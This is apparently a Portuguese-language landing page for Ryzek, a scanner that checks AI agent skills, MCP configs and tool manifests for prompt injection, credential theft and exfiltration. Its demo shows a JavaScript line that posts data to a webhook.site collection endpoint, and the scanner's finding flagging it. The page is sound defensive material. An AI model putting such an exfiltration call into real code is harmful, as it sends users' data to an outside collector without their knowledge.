Verificação de segurança para agentes de IA
Saiba o que uma skill faz antes de o seu agente executá-la.
O Ryzek lê skills, configs de servidores MCP e manifestos de ferramentas e sinaliza prompt injection, instruções ocultas, roubo de credenciais, permissões amplas demais e ferramentas que mudaram depois de você as aprovar. Cada achado vem com uma pontuação de confiança e o motivo dela.
Plano gratuito: 20 verificações por mês com todas as regras incluídas. Os arquivos verificados são lidos em memória e nunca armazenados.
const ENDPOINT = "https://webhook.site/0000-demo"; await fetch(ENDPOINT, { method: "POST", body: JSON.stringify(notes),});
O Ryzek encontrou 1 problema
Contains a hardcoded request-collection endpoint. These services exist to capture arbitrary inbound requests and are not used by production software.
webhook.site
Saída real do scanner, produzida quando esta página foi gerada.
O trailer
O Ryzek em oitenta segundos.
O que os agentes estão silenciosamente recebendo — e o que o Ryzek mostra a você antes de eles executarem.
Como funciona
Do envio a um veredito sobre o qual você pode agir.
Sem instalação. Entre, adicione seus arquivos, leia o que o Ryzek encontrou e por quê.
-
01 · Entre
Criar uma conta gratuita
Entre com uma conta que você já tem. Sua cota de verificações e seu histórico de ferramentas acompanham você em qualquer dispositivo.
-
02 · Adicione arquivos
Solte o que seu agente carrega
Pastas de skills com seus scripts, configs MCP, manifestos de ferramentas,
package.jsonourequirements.txt. -
03 · Leia
Receba um motivo, não só um alerta
Cada achado mostra sua gravidade, o quão confiante o Ryzek está, por quê, o texto exato que o acionou e sua categoria OWASP.
-
04 · Verifique de novo
Saiba quando uma ferramenta muda
O Ryzek mantém uma impressão digital de cada ferramenta — não o arquivo — para que uma verificação posterior possa avisar se algo que você aprovou mudou.
O que ele detecta
54 regras em cinco tipos de risco.
Cada regra tem uma demonstração ao vivo na página de regras: o arquivo, a parte que importa e o que o scanner realmente reporta.
18 regras · Segurança do agente
Texto direcionado à IA
Prompt injection, instruções ocultas em comentários ou caracteres invisíveis, resultados de ferramentas forjados e envenenamento de memória.
5 regras · Exfiltração
Rotas de saída dos seus dados
Endpoints de coleta, túneis de DNS, beacons de imagem e ferramentas que combinam leituras privadas com gravações públicas.
7 regras · Credenciais
Segredos no lugar errado
Chaves fixas no código, tokens em configs MCP, leituras de armazenamento de credenciais e histórico de shell, e requisições de metadados de nuvem.
13 regras · Cadeia de suprimentos
De onde veio o código
Servidores não fixados e falsificados, versões conhecidas como vulneráveis, hooks de instalação, servidores ocultos e ferramentas que mudaram após a aprovação.
11 regras · Execução
Mais poder do que a tarefa exige
Permissões amplas demais, ferramentas auto-aprovadas, fugas de sandbox, persistência e injeção de comandos.
Todas as regras
Ver todas as demonstrações →
Filtre por risco, leia a versão em linguagem simples e veja o resultado real de cada regra.
Por que o Ryzek
Achados que você pode conferir, de um scanner que diz onde para.
Um scanner que grita lobo demais é ignorado, e um que exagera nas alegações acaba sendo confiado quando não deveria. O Ryzek foi criado para evitar os dois.
Leia o que o Ryzek não consegue ver — incluindo comportamentos que só aparecem enquanto um servidor está em execução, e o que há dentro de programas compilados.
- Um motivo declarado em cada achado. O quão confiante a regra está, e por quê — para que uma pista de baixa confiança não pareça um ataque confirmado.
- Detecção de mudanças. Uma ferramenta que muda silenciosamente depois de aprovada é sinalizada na sua próxima verificação.
- Seus arquivos não são guardados. Os envios são verificados em memória e descartados. Armazenamos contagens de verificações e impressões digitais de ferramentas, nunca o conteúdo.
- Mapeado para o OWASP. Cada regra corresponde a uma categoria do OWASP MCP Top 10.
- Todas as regras em todos os planos. Os planos pagos vão adicionar volume e automação, não detecção.
Preços
Comece grátis. Todas as regras incluídas.
O plano gratuito executa o conjunto completo de regras, limitado por volume. Planos pagos com limites maiores abrem em breve.
Disponível agora
Free — US$ 0
20 verificações por mês, todas as 54 regras, detecção de mudanças e relatórios para download.
Abrindo em breve
Pro, Pro Plus e Teams
A partir de US$ 16 por mês, com 300 a 1.500 verificações por mês. Veja o que está incluído e peça para ser avisado quando abrirem.
Perguntas
Perguntas frequentes.
Vocês guardam os arquivos que eu verifico?
Não. Os arquivos são enviados ao scanner por HTTPS, verificados em memória e descartados quando o resultado volta. O que armazenamos é quantas verificações você já usou e uma impressão digital de cada ferramenta — hashes mais seus rótulos de permissão — para conseguirmos avisar se ela mudar. A política de privacidade tem os detalhes.
Por que preciso de uma conta?
Assim, sua cota de verificações e seu histórico de ferramentas vão para onde você for. A detecção de mudanças só funciona se o Ryzek lembrar como uma ferramenta era na última vez que você a verificou.
Quais arquivos posso verificar?
Pastas de skills (um SKILL.md mais os scripts ao lado), arquivos de config MCP como .mcp.json ou claude_desktop_config.json, manifestos de ferramentas em JSON, e package.json ou requirements.txt para hooks de instalação e dependências vulneráveis.
Um resultado limpo significa que uma skill é segura?
Não — significa que nenhuma das 54 regras correspondeu. O Ryzek lê arquivos; ele não os executa, então comportamentos que só aparecem em tempo de execução, ou dentro de um programa compilado, ficam fora do que ele consegue ver. Um resultado limpo é um bom sinal, não uma garantia.
Posso executar no CI?
Ainda não. A integração com CI está planejada para os planos pagos. Se isso for importante para você, nos avise — isso nos ajuda a decidir o que vem primeiro.
Verifique as skills em que seu agente já confia.
Leva um minuto para se cadastrar e adicionar seus primeiros arquivos.